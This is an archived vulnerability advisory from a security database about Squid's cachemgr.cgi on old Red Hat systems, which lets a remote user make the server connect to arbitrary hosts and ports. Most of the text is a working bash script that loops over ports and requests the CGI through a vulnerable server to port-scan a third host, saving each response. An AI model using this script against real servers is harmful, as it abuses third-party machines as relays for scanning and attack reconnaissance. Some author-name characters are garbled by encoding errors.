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source: https://www.securityfocus.com/bid/2059/info
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The 'cachemgr.cgi' module is a management interface for the Squid proxy service. It was installed by default in '/cgi-bin' by Red Hat Linux 5.2 and 6.0 installed with Squid. This script prompts for a host and port, which it then tries to connect to. If a webserver such as Apache is running, this can be used to connect to arbitrary hosts and ports, allowing for potential use as an intermediary in denial-of-service attacks, proxied port scans, etc. Interpreting the output of the script can allow the attacker to determine whether or not a connection was established.
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#!/bin/bash -x
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# Port scanning using a misconfigured squid
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# using open apache
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# Usage miscachemgr host_vuln host_to_scan end_port
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# Concept: Jacobo Van Leeuwen & Francisco S<>a Mu<4D>oz
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# Coded by Francisco S<>a Mu<4D>oz
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# IP6 [Logic Control]
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PORT=1
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ONE='/cgi-bin/cachemgr.cgi?host='
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TWO='&port='
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THREE='&user_name=&operation&auth='
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mkdir from_$1_to_$2
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while [ $PORT -lt $3 ]; do
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# lynx -dump http://$1/cgi-bin/cachemgr.cgi?host=\
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# $2&port=$PORT&user_name=&operation=authenticate&auth= > \
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# port_$1_to_$2/$PORT.log 2>&1
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lynx -dump http://$1$ONE$2$TWO$PORT$THREE > from_$1_to_$2/$PORT.log 2>&1
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let PORT=PORT+1
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done |